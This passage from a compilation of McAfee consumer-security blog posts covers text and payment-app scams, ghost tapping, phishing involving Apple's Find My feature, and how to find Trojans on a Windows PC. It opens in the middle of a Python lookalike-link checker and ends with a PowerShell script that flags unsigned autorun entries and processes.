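    """Same comparison for the domain part of an e-mail sender address."""
    domain = address.rsplit("@", 1)[-1]
    return registrable_domain(domain) == registrable_domain(expected_domain)


if __name__ == "__main__":
    # Constructed sample links, modelled on the post's examples.
    for link in (
        "https://www.genericairlines.com/manage-booking",
        "http://genericairlines.rebookyourflight.com/rebook",
        "https://genericairlines-rebooking.com/",
    ):
        result = check_link(link, "genericairlines.com")
        status = "OK " if result["matches_expected"] else "BAD"
        print(status, link, *result["findings"], sep="  ")
```

The lookalike hostname “genericairlines-rebooking.com” is caught by the same rule: its registrable domain is not the one the traveler expects, regardless of what the hostname starts with or whether the page loads over TLS.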

    Get a scam detector to spot bogus links for you.

    Even with these tips and tools, spotting bogus links with the naked eye can get tricky. Some look “close enough” to a legitimate link that you might overlook it. Yet a combination of features in our McAfee+ plans can help do that work for you. Our Scam Detector helps you stay safer with advanced scam detection technology built to spot and stop scams across text messages, emails, and videos. Likewise, our Web Protection will alert you if a link might take you to a sketchy site. It’ll also block those sites if you accidentally tap or click on a bad link.

    Scammers Hijack a Trusted Mass Texting Provider

    You’ve probably seen plenty of messages sent from short code numbers. They’re the five- or six-digit numbers organizations use to send texts in place of a regular phone number. For example, your cable company might use one to send a text for resetting a streaming password, your pharmacy might use one to let you know a prescription is ready, your state’s DoT might use one to issue a winter travel alert, and so on.

    According to NBC News, scammers sent hundreds of thousands of texts using codes used by the state of New York, a charity, and a political organizing group. The article also cites an email sent to messaging providers by the U.S. Short Code Registry, an industry nonprofit that maintains those codes in the U.S. In the email, the registry said attempted attacks on messaging providers are on the rise.

    What this means for the rest of us is that just about any text from an unknown number, and now short codes, might contain malicious links and content. It’s one more reason to arm yourself with the one-two punch of our Scam Detector and Web Protection.

    What are short codes?
    Short codes are 5–6 digit numbers used by pharmacies, utilities, banks, and government agencies to send official alerts.

    Why this attack is unusual
    Scammers didn’t spoof short codes—they gained access to real ones used by:

    • The State of New York
    • A charity
    • A political organizing group

    Why this matters
    Even texts from legitimate short-code numbers can no longer be trusted at face value.

    What to do now

    • Treat any unexpected text—even from a short code—as suspicious.
    • Don’t tap links.
    • Verify by going directly to the official website or app.

    Quick Scam Roundup

    Consumers warned over AI chatbots giving inaccurate financial advice 

    • Our advice: Always verify recommendations with trusted financial sources

    Why our own clicks are often cybercrime’s greatest allies

    • Our advice: Many attacks rely on rushed or emotional decisions, slow down before clicking

    TikTok malware scam uses fake software activation guides to steal data

    • Our advice: Download software only from official sources


    We’ll be back after the Thanksgiving weekend with more updates, scam news, and ways to stay cyber safe.

    The post This Week in Scams: DoorDash Breach and Fake Flight Cancellation Texts appeared first on McAfee Blog.

    How to Follow McAfee on Google News in One Simple Step

    By: McAfee

    Want McAfee’s latest scam alerts, cybersecurity tips, and safety updates to show up automatically in your Google News feed? You can follow McAfee directly on Google News with a single tap.

    Google News now gives every official publisher a dedicated page — and McAfee has one. Once you follow us, our newest articles will appear in your Following tab and throughout your personalized news feed whenever they’re relevant to you.

    Here’s how to do it in seconds.

    Follow McAfee on Google News

    Step 1: Go to our official Google News page

    Tap or click this link:

    McAfee Official Google News Source Page

    This opens McAfee’s verified publisher page inside Google News.

    Image shows McAfee's Google News source page.

    Step 2: Tap the ⭐ “Follow” button

    You’ll see a star icon at the top of the page.

    Tap Follow and you’re done.

    That’s it — McAfee is now part of your personalized news feed.

    What happens after you follow McAfee

    When you tap the star:

    • McAfee appears under Following → Sources in Google News
    • Our stories show up more often when you search for cybersecurity topics
    • You’ll see McAfee alerts, safety tips, and threat updates sooner
    • Google prioritizes McAfee when we publish on topics you care about (AI scams, malware, identity theft, etc.)

    No settings menus. No advanced search. Just one tap.

    How to Unfollow or Manage Your Sources

    If you ever want to update your feed:

    1. Open Google News

    2. Go to Following → Sources

    3. Tap the star again to unfollow

    4. Or rearrange which sources matter most to you


    Image shows how to find your preferred sources in Google News


    FAQs

    Do I need the Google News app?

    No. Following works in both browsers and the app.

    Will this make McAfee show up first for every search?

    Not automatically — but Google does prioritize publishers you follow when the content is relevant.

    Can I follow McAfee on multiple devices?

    Yes. It’s tied to your Google account, not your phone or laptop.

    Is the follow button safe?

    Absolutely. This is Google’s built-in publisher follow system.

    Stay Updated, Stay Safer

    Cyber threats move fast — following McAfee on Google News makes it easier to stay ahead of scams, breaches, and emerging AI risks.

    The post How to Follow McAfee on Google News in One Simple Step appeared first on McAfee Blog.

    Ghost Tapping: What It Is, How It Works, and How to Stay Safe

    By: McAfee

    Contactless payments make everyday purchases fast and easy. Yet with that convenience comes a risk: ghost tapping.

    In crowded spaces or rushed moments, a scammer could trigger a small tap-to-pay charge or push through a higher amount without your clear consent. Understanding what ghost tapping is, how it happens, and what to do next helps you keep your money and identity secure.

    What Is Ghost Tapping?

    Ghost tapping is a form of contactless fraud where someone attempts to initiate a tap-to-pay transaction without your approval.

    Tap-to-pay cards and mobile wallets on phones use a technology called “near-field communication,” or NFC. That lets them communicate with things like a point-of-sale device for payment at a very close range. It’s generally quite safe, particularly because of the “near” part. You have to get very close to make the connection.

    Even so, proximity and distraction can be exploited. Attackers may try to skim limited details from RFID (Radio Frequency Identification technology) cards or NFC cards, or nudge you into approving a payment you didn’t intend. If you’ve ever wondered what ghost tapping is, think of it as an opportunistic, in-person scam that abuses the tap-to-pay moment rather than a remote hack.

    How Ghost Tapping Happens

    Most schemes rely on getting close and catching you off guard. A criminal might carry a portable reader, press into a pocket or bag, and attempt a low-value charge. Others set up tampered terminals, rushing you so you don’t check the amount.

    Consider These Two Scenarios:

    You’re at a busy farmer’s market. A scammer with a phone equipped with a point-of-sale app stumbles into you and gets close enough to your card to trigger a transaction. It’s almost like a modern-day pickpocket move, where the bump distracts the victim from the theft as it happens.

    In another case, you might come across a phony vendor. Maybe someone’s selling cheap hats outside a football game or someone’s going around your neighborhood selling candy, supposedly to support a charity. In scenarios like these, you tap to pay with your phone just as you’d expect… but with one exception: the “vendor” jacks up the purchase price. They hurry you through the transaction, so quickly that you don’t review the screen before you confirm payment.

    We’ve also seen reports of people getting Apple Pay scammed by impostor merchants who exploit quick taps and small screens. While mobile wallets add strong safeguards, poor visibility and social pressure can still lead to losses.

    The Better Business Bureau on Ghost Tapping:

    A report posted on the Scam Tracker at the Better Business Bureau (BBB) shows how the phony vendor version of this scam allegedly played out:

    “An individual is going door to door in [location redacted] claiming to be selling chocolate on behalf of [redacted] to support special needs students. He says that he can only accept tap-to-pay to get people to pay with a card. He then charges large amounts to the card without the cardholder being able to see the amount. He got my mother for $537… Another victim for $1100… He changes neighborhoods frequently to avoid getting caught.”

    Signs of Ghost Tapping and Common Myths

    Detecting ghost tapping early starts with vigilance. Watch for unfamiliar small charges, especially after crowded events, and alerts tied to contactless transactions. If you see odd activity tied to RFID cards or NFC cards, act quickly.

    Common myths persist. Attackers can’t drain accounts from far away, clone full cards via a tap, or bypass wallet protections easily. Most successful cases hinge on proximity, distraction, and human error. Meanwhile, Apple Pay scam stories often involve rushed taps and unverified totals.

    Effective detection of ghost tapping focuses on timely alerts, careful review, and immediate response.

    How to Protect Yourself from Ghost Tapping Scams

    The BBB, which recently broke the story of these scams, offers several pieces of advice. We have some advice we can add as well.

    From the BBB…

    • Store your cards securely. An RFID-blocking wallet or sleeve can help stop wireless skimming.
    • Always confirm payment details. Before tapping your card or phone, check the merchant’s name and amount on the terminal screen.
    • Set up transaction alerts. Many banks allow real-time notifications for every charge.
    • Keep an eye on your accounts. Daily checks help you spot fraud faster.
    • Limit tap-to-pay use in high-risk areas. Consider swiping or inserting your card instead.

    From us at McAfee…

    Monitor your identity and your credit.

    The problem with many card scams is that they can lead to further identity theft and fraud, which you only find out about once the damage is done. Actively monitoring your identity and credit goes beyond single transaction alerts from your bank and can spot an emerging problem before it becomes an even bigger one. You can take care of both easily with timely notifications from our credit monitoring and identity monitoring features, all as part of our McAfee+ plans.

    When you’re out and about, consider what you’re carrying—and where you carry it.

    The physical safety of your phone and cards counts as well. While ghost tapping scams are new, old-school physical pickpocketing attempts persist. When it comes to devices and things like debit cards, credit cards, and even cash, keep what you bring with you to the bare minimum when you go out. This can cut your losses if the unfortunate happens. If you have a credit card and ID holder attached to the back of your phone, you may want to remove your cards from it. That way, if your phone gets snatched, those important cards don’t get snatched as well.

    When in doubt, shop with a credit card.

    In the U.S., credit cards offer you additional protection that debit cards don’t. That’s thanks to the Fair Credit Billing Act (FCBA). It limits your liability to $50 for fraudulent charges on a credit card if you report the loss to your issuer within 60 days.

    The post Ghost Tapping: What It Is, How It Works, and How to Stay Safe appeared first on McAfee Blog.

    Venmo 101: Making Safer Payments with the App

    By: McAfee

    As the holiday season ramps up, so do group dinners, shared travel costs, gift exchanges, and all the little moments where someone says, “Just Venmo me.”

    With more people sending and splitting money this time of year, scammers know it’s prime time to target payment apps. Here’s how to keep your Venmo transactions safe during one of the busiest — and riskiest — payment seasons.

    What kind of scams are on Venmo?

    Venmo scams come in all shapes, and many of them look like variations of email phishing and text scams. The scammers behind them will pose as Venmo customer service reps who ask for your login credentials. Other scammers offer bogus cash prizes and pyramid schemes that lure in victims with the promise of quick cash. Some scammers will use the app itself to impersonate friends and family to steal money.

    Venmo has a dedicated web page on the topic of scams, and lists the following as the top Venmo scams out there:

    • Fake Prize or Cash Reward
    • Call from Venmo
    • Call from Tech Support
    • Fake Payment Confirmation
    • Pre-payment for Goods and Services
    • Stranger Posing as a Friend
    • Payments from Strangers
    • Offers to Make Money Fast
    • Paper Check Scam
    • Romance Scam

    Venmo has thorough instructions to combat these scams and breaks them down in detail on its site. They also provide preventative tips and steps to take if you unfortunately fall victim to one of these scams. Broadly speaking, though, avoiding Venmo scams breaks down into a few straightforward steps.

    How to avoid getting scammed on Venmo

    1) Never share private details.

    Scammers often pose as customer service reps to pump info out of their victims. They’ll ask for things like bank account info, debit card or credit card numbers, or even passwords and authentication codes sent to your phone. Never share this info. Legitimate reps from legitimate companies like Venmo won’t request it.

    2) Know when Venmo might ask for your Social Security number.

    In the U.S., Venmo is regulated by the Treasury Department. As such, Venmo might require your SSN in certain circumstances. Venmo details the cases where they might need your SSN for reporting, here on their website. Note that this is an exception to what we say about sharing SSNs and tax ID numbers. As a payment app, Venmo might have legitimate reasons to request it. However, don’t send this info by email or text (any email or text that asks you to do that is a scam). Instead, always use the mobile app by going to Settings –> Identity Verification.

    3) Keep an eye out for scam emails and texts.

    Venmo always sends communications through its official “venmo.com” domain name. If you receive an email that claims to be from Venmo but that doesn’t use “venmo.com,” it’s a scam. Never click or tap on links in emails or texts supposedly sent by Venmo.

    4) Be suspicious of the messages you get. Imposters are afoot.

    Another broad category of scams includes people who aren’t who they say they are. In the case of Venmo, scammers will create imposter accounts that look like they might be a friend or family member but aren’t. If you receive an unexpected and likely urgent-sounding request for payment, contact that person outside the app. See if it’s really them.

    5) When sending money, keep an eye open for alerts from the app.

    Just recently, Venmo added a new feature, dynamic alerts, which helps protect people when sending money via the “Friends and Family” option. It pops up an alert if the app detects a potentially fraudulent transaction and includes info that describes the level of risk involved. In the cases of highly risky payments, Venmo might decline the transaction altogether. This adds another level of protection to Friends and Family payments, which are non-refundable in cases of fraud. Further, this underscores another important point about using Venmo: only pay people you absolutely know and trust.

    More ways to stay safe on Venmo

    Keep your transactions private. Venmo has a social component that can display a transaction between two people and allow others to comment on it. Payment amounts are always secret. Yet you have control over who sees what by adjusting your privacy settings:

    • Public – Everyone on the internet can see and comment on the transaction.
    • Friends – Only your Venmo friends and the other participant’s friends can see and comment on the transaction. (Note that the friends of the other participant might be strangers to you, so “friends and friends of friends” is more accurate here.)
    • Private – Here, only the participants can view and comment on the transaction.

    This brings up the question, what if the participants in the transaction have different privacy settings? Venmo uses the most restrictive one. So, if you’re paying someone who has their privacy set to “Public” and you have yours set to “Private,” the transaction will indeed be private.

    We suggest going private with your account. The less financial information you share, the better. You can set your transactions to private by heading into the Settings of the Venmo app, tapping on Privacy, and then selecting Private.

    In short, just because something is designed to be social doesn’t mean it should become a treasure trove of personal data about your spending habits.

    Add extra layers of security. Take extra precautions that make it difficult for others to access your Venmo app.

    • First off, lock your phone. Whether with a PIN or other form of protection, locking your phone prevents access to everything you keep on it, which is important in the case of loss or theft. Our own research found that only 58% of adults take the vital step of locking their phones. If you fall into the 42% of people who don’t, strongly consider changing that.
    • Within the Venmo app, you can also enable Face ID and a PIN (on iOS) or a PIN and biometric unlock (Android). These add a further layer of security by asking for identification each time you open the app. That way, even if someone gets access to your phone, they’ll still have to leap through that security hurdle to access your Venmo app.
    • Use a strong, unique password for your account. That’s a password with at least 13 characters using a mix of cases, numbers, and symbols that you don’t use anywhere else. You can also have a password manager do that work for you across all your accounts.

    Keep your online finances even more secure with the right tools

    Online protection software like ours offers several additional layers of security when it comes to your safety and finances online.

    For starters, it includes Web Protection and Scam Detector that can block malicious and questionable links that might lead you down the road to malware or a phishing scam, such as a phony Venmo link designed to steal your login credentials. It also includes a password manager that creates and stores strong, unique passwords for each of your accounts.

    Moreover, it further protects you by locking down your identity online. Transaction Monitoring and Credit Monitoring help you spot any questionable financial activity quickly. And if identity theft unfortunately happens to you, up to $2 million in ID theft coverage & restoration can help you recover quickly.

    The post Venmo 101: Making Safer Payments with the App appeared first on McAfee Blog.

    This Week in Scams: New Alerts for iPhone and Android Users and a Major Google Crackdown

    By: McAfee

    Welcome back to another This Week in Scams.

    This week, we have attacks that take over Androids and iPhones, plus news that Google has gone on the offensive against phishing websites.

    First up, a heads-up for iPhone owners.

    The “We found your iPhone” scam

    In the hands of a scammer, “Find My” can quickly turn into “Scam Me.”

    Switzerland’s National Cyber Security Center (NCSC) shared word this week of a new scam that turns the otherwise helpful “Find My” iOS feature into an avenue of attack.

    Now, the thought of losing your phone, along with all the important and precious things you have on it, is enough to give you goosebumps. Luckily, the “Find My” feature can help you track it down and even post a personalized message on the lock screen to help with its return. And that’s where the scam kicks in.

    From the NCSC:

    When a device is marked as lost, the owner can display a message on the lock screen containing contact details, such as a phone number or email address. This can be very helpful if the finder is honest – but in dishonest hands, the same information can be used to launch a targeted phishing attack.

    With that, scammers send a targeted phishing text, as seen in the sample provided by the NCSC below …

    A smartphone screenshot showing a fraudulent text message claiming a lost iPhone 14 has been located and instructing the recipient to click a link. A large red diagonal stamp reading “Betrug / Fraud” overlays the message, indicating it is a scam.
    Source: NCSC, Switzerland

    What do the scammers want once you tap that link? They request your Apple ID and password, which effectively hands your phone over to them—along with everything on it and everything else that’s associated with your Apple ID.

    It’s a scam you can easily avoid. And even if you’re still stuck with a lost phone that’s likely in the hands of a scammer, there is some consolation: without your Apple ID credentials, the phone is useless to them, because Activation Lock keeps it tied to your account. That is exactly why the phishing text exists. The scammer already has the hardware; the only thing standing between them and a resalable, unlocked device is your password.

    Here’s what the NCSC suggests:

    Ignore such messages. The most important rule is Apple will never contact you by text message or email to inform you that a lost device has been found.

    Never click on links in unsolicited messages or enter your Apple ID credentials on a linked website.

    If you lose your device, act immediately. Enable Lost Mode straight away via the Find My app on another device or at iCloud.com/find. This will lock the device.

    Be careful about which contact details you show on your lost device’s lock screen. For example, use a dedicated email address created specifically for this purpose. Never remove the device from your Apple account, as this would disable the Activation Lock.

    Make sure your SIM card is protected with a PIN. This simple yet effective measure prevents criminals from gaining access to your phone number.

    Android phone takeover scam

    Now, a different attack aimed at Android owners …

    A story shared on Fox this week breaks down how a combination of paid search ads, remote access tools, and social engineering has led to hijacked Android phones.

    It starts with a search, where an Android owner looks up a bank, a tech support company, or what have you. Instead of getting a legitimate result, they get a link to a bogus site via paid search results that appear above organic search results. The link, and the page it takes them to, look quite convincing, given the ease with which scammers can spin up ads and sites today. (More on that next.)

    Once there, they call a support number and get connected to a phony agent. The agent convinces the victim to download an app that will help the “agent” solve their issue with their account or phone. In fact, the app is a remote access tool that gives control of the phone, and everything on it, to the scammer. That means they can steal passwords, send messages to friends, family, or anyone at all, and even go so far as to lock you out.

    Basically, this scam hands over one of your most precious possessions to a scammer.

    Here’s how you can avoid that:

    Skip paid search results for extra security. That’s particularly true when contacting your bank or other companies you’re doing business with. Look for their official website in the organic search results below paid ads. Better yet, contact places like your bank or credit card company by calling the number on the back of your card.

    Get a scam detector. A combination of our Scam Detector and Web Protection can call out sketchy links, like the bogus paid links here. They’ll even block malicious sites if you accidentally tap a bad link.

    Never download apps from third-party sites outside of the Google Play Store. Google has checks in place to spot malicious apps in its store.

    Lastly, never give anyone access to your phone. No bank rep needs it. So if someone on a call asks you to download an app like TeamViewer, AnyDesk, or AirDroid, it’s a scam. Hang up.

    Beyond that, you can protect yourself further by installing an app like our McAfee Security: Antivirus VPN, available in the Google Play Store. The app includes our Scam Detector and Identity Monitoring, and it is also part of your McAfee+ protection.

    Google takes aim at phishing scams with a lawsuit against an alleged criminal organization

    Just Wednesday, Google took a first step toward making the internet safer from bogus sites, per a story filed by National Public Radio.

    The lawsuit alleges that a China-based company called “Lighthouse” runs a “Phishing-as-a-Service” operation that outfits scammers with quick and easy tools and templates for creating convincing-looking websites. According to Google’s general counsel, these sites could “compromise between 12.7 and 115 million credit cards in the U.S. alone.”

    The suit was filed in the U.S. District Court in the Southern District of New York, which, of course, has no jurisdiction over a China-based company. The aim, per Google’s counsel, is deterrence. From the article:

    “It allows us a legal basis on which to go to other platforms and services and ask for their assistance in taking down different components of this particular illegal infrastructure,” she said, without naming which platforms or services Google might focus on. “Even if we can’t get to the individuals, the idea is to deter the overall infrastructure in some cases.”

    We’ll keep an eye on this case as it progresses. And in the meantime, it’s a good reminder to get Scam Detector and Web Protection on all your devices so you don’t get hoodwinked by these increasingly convincing-looking scam sites.

    Again, scammers can roll them out so quickly and easily today.

    And now for a quick roundup …

    Here’s a quick list of a few stories that caught our eye this week:

    Alarmingly realistic deepfake threats now target banks in South Africa

    Nearly 80% of parents fear their kids will fall for an AI scam, but they aren’t sure how to talk about it

    Hyundai data breach exposes 2.7 million Social Security numbers

     

    And that’s it for this week! We’ll see you next Friday with more updates, scam news, and ways you can stay safer out there.

    The post This Week in Scams: New Alerts for iPhone and Android Users and a Major Google Crackdown appeared first on McAfee Blog.

    Best Ways to Check for a Trojan on Your PC

    By: McAfee

    Trojan horse malware was recently in the news after researchers discovered a campaign built around an email with an innocent-looking .pdf attachment. CSO Online reported that clicking the attachment triggered a permission prompt; when the recipient clicked “Allow,” the document was downloaded and saved, and the malware executed. The Trojan itself did nothing without that click, which is the whole point of the technique.

    Trojans continue to be one of the most widespread cyber threats globally, accounting for 58% of all malware as reported by Dataprot.net, and criminals keep adapting their methods to bypass increasingly advanced security measures. But all is not lost. In this guide, we take a closer look at how to recognize the signs of a Trojan on your computer, how to confirm an infection, and how to remove it.

    What is a Trojan?

    A Trojan, often referred to as a Trojan horse, is a type of malicious software that disguises itself as a legitimate program to deceive users into installing it on their devices. Its name is taken from the story of Odysseus, who hid his Greek soldiers inside a wooden gift horse to infiltrate the city of Troy.

    While the term “Trojan virus” is commonly used, a Trojan is not technically a virus. Both are types of malware, but they behave differently. A virus is a piece of code that attaches itself to other programs and, when run, replicates itself to spread to other files and systems. A Trojan, however, is a standalone program that cannot self-replicate. It relies entirely on tricking the user into downloading and executing it.

    From their beginnings in the 1980s as simple social engineering tricks with limited technical sophistication, modern Trojans have dramatically transformed to become multi-stage campaigns that use legitimate-looking emails, fake software updates, and compromised websites to deliver malware that can remain undetected for months. Recently, Trojan attacks have exploited the supply chain to target software vendors directly, allowing criminals to distribute the malware through channels that consumers trust.

    The dangers that Trojans bring

    The dangers of a Trojan are extensive, ranging from direct financial loss to a complete invasion of your privacy. Once a Trojan enters your PC, cybercriminals can steal sensitive credentials for your banking and credit card accounts, which can lead directly to theft. They can also access and exfiltrate personal files, photos, and documents, creating a severe privacy exposure.

    Beyond theft, an attacker can use this access to take complete control of your device. They might install other types of malware, such as ransomware or spyware, use your computer as part of a botnet to attack others, or simply monitor your every keystroke. This total loss of device control and privacy is one of the biggest dangers. However, these risks are manageable if caught early. This demonstrates the importance of layered protection with real-time monitoring and community intelligence. As cybercrime attack methods evolve, your security needs to evolve as well.

    Methods of spreading Trojans

    • Phishing emails: These legitimate-looking emails contain malicious attachments or links that, when opened, install the Trojan. To avoid getting infected, never open attachments from unsolicited sources.
    • Cracked software: Websites offering free versions of paid software often bundle malware, including Trojans, with the download. That “free” software could cost you everything. View such offers with a healthy dose of skepticism. Always use legitimate, official software.
    • Fake updates: Pop-ups pretending to be legitimate updates for software like Adobe Flash Player can trick you. (Adobe discontinued Flash Player at the end of 2020, so any “Flash update” prompt you see today is fake by definition.) To update your software, it is best to use the application’s built-in updater or visit the official website directly.
    • Malvertising: Malicious ads on legitimate websites can redirect you to pages that automatically download malware. When these online ads pop up, be cautious about clicking them.

    The Trojan invasion process

    A Trojan infection follows a stealthy, multi-stage process. The delivery stage begins with a lure, where social engineering tactics, such as a convincing email or a free software offer, trick you into downloading and opening a malicious file. In the execution stage, you run the seemingly harmless program and unknowingly trigger the Trojan’s installation. The malware then often embeds itself into your system’s startup processes to ensure it persistently runs every time you turn on your PC. From there, it connects to a remote command-and-control server operated by the attacker, awaiting instructions for its malicious actions, such as stealing your credentials or monitoring your activity.

    Types of Trojan malware

    Trojans come in different forms, each with their own process of attack. Here are some of them:

    • Backdoor Trojans: These create a hidden backdoor, bypassing normal authentication measures. These backdoors often remain hidden for long periods, allowing attackers to steal files, or install additional malware without your knowledge.
    • Keylogger Trojans: Once installed, these record your keystrokes to capture passwords and anything else you type, often alongside periodic screen captures. Many ship as part of a remote access Trojan (RAT) that also lets the attacker browse your files and control your PC from afar.
    • Banker Trojans: As the name suggests, these Trojans are designed to steal your login credentials for online banking, payment systems, and credit card accounts. They work by hijacking browser sessions, injecting fake login pages, or capturing keystrokes to steal your credentials and manipulate your transactions.
    • Downloader Trojans: These Trojans act as delivery mechanisms for other malware. One type, the downloader, connects to a remote server to fetch additional malicious payloads after the initial infection. Another type, the dropper, carries the other malware inside its own code and deploys it directly upon execution.
    • DDoS Trojans: They turn infected computers into zombie-like “bots” that participate in Distributed Denial-of-Service attacks that overwhelm and crash websites, servers, and online services, causing outages or financial damage.
    • Scareware or fake antivirus Trojans: This type of malware mimics legitimate security software, showing fake virus alerts to scare you into paying for a “premium” but useless version or further compromise the device.

    Real-life Trojan attacks

    • Banking credential theft: The Zeus Trojan family spread through fake banking emails with links to infected websites. Once installed, it secretly captured online banking passwords and credit card details as users typed them. This led to millions of dollars in stolen funds and compromised accounts worldwide, forcing banks to implement stronger authentication measures.
    • Corporate data exfiltration: Emotet initially appeared as urgent invoice attachments and shipping notifications in business emails. After infection, it silently collected email contacts, login credentials, and sensitive documents from corporate networks. Companies faced significant data breaches, regulatory fines, and damaged customer trust as their confidential information was sold on criminal marketplaces.
    • Botnet recruitment: Mirai targeted smart home devices, routers, and security cameras that were still using default login credentials. (Strictly speaking Mirai is a self-propagating worm rather than a Trojan, since it scanned for and logged into vulnerable devices on its own, but it illustrates the botnet payload well.) Infected devices became part of massive botnets used to launch devastating attacks that temporarily shut down major websites and services, while users remained unaware that their gadgets were being exploited for cyberattacks.
    • Multi-stage attacks: TrickBot masqueraded as software updates and legitimate business documents. Aside from stealing banking information, it installed ransomware that encrypted entire networks. Organizations faced operational shutdowns, hefty ransom demands, and costly recovery efforts that sometimes took months to complete.

    By understanding the signs of a Trojan virus presence on your computer and using comprehensive security software, you dramatically reduce the danger and protect your digital life.

    Signs of Trojan presence on your PC

    A Trojan attack isn’t just a single event; it’s the entire process a cybercriminal uses to trick you into running malicious software. Recognizing the early warning signs is key. Here are some of the most common cues that can help you know if you have a Trojan virus attack in progress.

    • Slower-than-usual computer performance: Trojans often install additional malware that consumes CPU time and memory. This can significantly slow your computer down and cause your operating system to become unstable and sluggish.
    • Unauthorized apps appear: A common symptom of Trojan infection is the sudden appearance of apps you don’t recall downloading or installing. If you notice an unfamiliar app from an unverified developer in your Windows Task Manager, there’s a good chance that it is malicious software installed by a Trojan.
    • Operating system crashes and freezes: Trojans can destabilize your system, causing recurring crashes and freezes. An example of this is the Blue Screen of Death, a Windows stop error raised when the kernel hits a fault it cannot recover from, commonly a faulty driver (including ones installed by malware) or a hardware failure.
    • Frequent browser redirects: A Trojan can manipulate your browser or modify the Domain Name System settings to redirect the user to malicious websites. Frequent redirects are a red flag, so scan your computer immediately if you notice an increase in these redirect patterns.
    • Aggressive popups: If you’re noticing more pop-up ads than usual, especially those claiming your web browser or a media player is out of date, one likely cause is adware that a Trojan has installed on your PC. Those fake “update” alerts are themselves a lure, designed to get you to install more malware instead of a real update.
    • Disabled security and other software: Trojans can interfere with applications and prevent them from running. A common mid-attack behavior is the Trojan deactivating your browser, apps such as word processing and spreadsheet software, or your antivirus or firewall. It’s a major red flag.
    • Unexpected password requests: The Trojan may display a fake system prompt asking you to re-enter your computer password or credentials for an online account, which it then captures.
    • Constant, unexplained network activity: Your computer’s internet connection may seem unusually busy even when you’re not using it. This could be the Trojan communicating with a remote server.

    Recognizing these signs early allows you to act quickly. If something feels off, trusting your instincts and running a scan can help you identify and contain a threat before it causes significant harm.

    4 best ways to check for a Trojan on your PC

    If you’re noticing any of the symptoms above, it’s time to investigate further using automated tools and manual checks. A layered approach is the most effective way to identify and confirm a Trojan infection. To get started, follow the steps below:

    1. Scan your PC

    The first step is to scan your PC using antivirus software. Plenty of options are available on the market offering real-time protection from all types of malicious software threats, including viruses, rootkits, spyware, adware, ransomware, and Trojans. Some also feature on-demand and scheduled scanning of files and apps, an advanced firewall for home network security, and compatibility with Windows, macOS, Android, and iOS devices.

    2. Search for Trojans while in safe mode

    The next step is to search for Trojans while your computer is in Safe Mode. In this mode, Windows loads only the drivers and services it needs to run, so malware that relies on the normal startup sequence usually doesn’t load, and unfamiliar entries are easier to spot. Here’s how to do it:

    1. Type “msconfig” in the search bar from the Start menu and open System Configuration.
    2. Click on the “Boot” tab.
    3. Tick “Safe boot” (leave “Minimal” selected), click “Apply,” then “OK,” and restart.
    4. After the system restarts in Safe Mode, open Task Manager (Ctrl+Shift+Esc) and click on the “Startup” tab. On Windows 8 and later, the Startup tab in System Configuration only points you to Task Manager.
    5. Examine the list. Right-click a column header to add “Command line,” and check each entry’s publisher and the folder its file lives in.
    6. Disable any you deem suspicious, and note the file path so your antivirus scan can deal with the file itself. Disabling a startup entry stops it from launching; it does not remove the program.
    7. When you’re done, re-open System Configuration, untick “Safe boot,” and restart. Otherwise the PC will keep booting into Safe Mode.

    3. Check processes in Windows Task Manager

    Another effective way to detect whether Trojans are in your system is to check the processes running in Windows Task Manager. This will allow you to see if there are any unfamiliar or unauthorized programs or suspicious activity.

    To open Task Manager, press Ctrl+Shift+Esc (or press Ctrl+Alt+Del and choose Task Manager) and click on the “Processes” tab. Right-click a column header and add “Publisher” and “Command line.” Review the list for programs with no publisher, a publisher you don’t recognize, or a name you don’t remember installing. For anything suspicious, right-click it and choose “Open file location”: a process that borrows a system name such as svchost.exe but runs from a user profile or a temp folder instead of C:\Windows\System32 is a classic sign of trouble. “End task” stops the process for now, but it is not removal; note the path and let your antivirus scan handle the file.
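    The Safe Mode startup check and the Task Manager review above can be done in one pass from PowerShell. The script below is an added example written for this article, not something from the McAfee post or the McAfee product: it walks the usual autorun locations (the Run/RunOnce registry keys and the Startup folders), lists running processes with their image paths, and checks each file’s Authenticode signature, printing only the entries whose signature is missing or invalid. It assumes a Windows 10 or 11 machine and an elevated PowerShell window.

```powershell
# Added example, not from the McAfee article: enumerate autorun entries and
# running processes, then flag binaries with a missing or invalid signature.
# Assumption: Windows 10/11, run from an elevated PowerShell prompt.

$runKeys = @(
  'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
  'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
  'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
  'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
  'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)

# Pull the executable out of a registry command line, e.g.
#   "C:\Program Files\App\app.exe" --tray      or      C:\Tools\x.exe /quiet
function Get-ExePath([string]$CommandLine) {
  if ($CommandLine -match '^\s*"([^"]+)"')  { return $Matches[1] }
  if ($CommandLine -match '^\s*(\S+\.exe)') { return $Matches[1] }
  return $null
}

$items = @()

# 1. Registry autoruns
foreach ($key in $runKeys) {
  if (-not (Test-Path $key)) { continue }
  foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
    if ($p.Name -like 'PS*') { continue }        # skip PowerShell's own metadata properties
    $items += [pscustomobject]@{ Source = $key; Name = $p.Name; Path = (Get-ExePath $p.Value) }
  }
}

# 2. Startup folders: everything here launches at logon
foreach ($dir in @([Environment]::GetFolderPath('Startup'), [Environment]::GetFolderPath('CommonStartup'))) {
  Get-ChildItem -Path $dir -File -ErrorAction SilentlyContinue | ForEach-Object {
    $items += [pscustomobject]@{ Source = $dir; Name = $_.Name; Path = $_.FullName }
  }
}

# 3. Running processes (what Task Manager's Processes tab shows). Path is empty
#    for protected system processes we can't open; those are skipped below.
Get-Process | Where-Object { $_.Path } | ForEach-Object {
  $items += [pscustomobject]@{ Source = 'Process'; Name = "$($_.ProcessName) (PID $($_.Id))"; Path = $_.Path }
}

# 4. Signature check. "NotSigned" is not proof of malware, but an unsigned
#    binary in a user profile or temp folder is exactly what to look at.
$report = $items | Where-Object { $_.Path -and (Test-Path $_.Path) } | ForEach-Object {
  $sig = Get-AuthenticodeSignature -FilePath $_.Path
  [pscustomobject]@{
    Source    = $_.Source
    Name      = $_.Name
    Path      = $_.Path
    Status    = $sig.Status
    Publisher = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '<unsigned>' }
  }
}

$report | Where-Object { $_.Status -ne 'Valid' } | Sort-Object Source, Name | Format-Table -AutoSize
```

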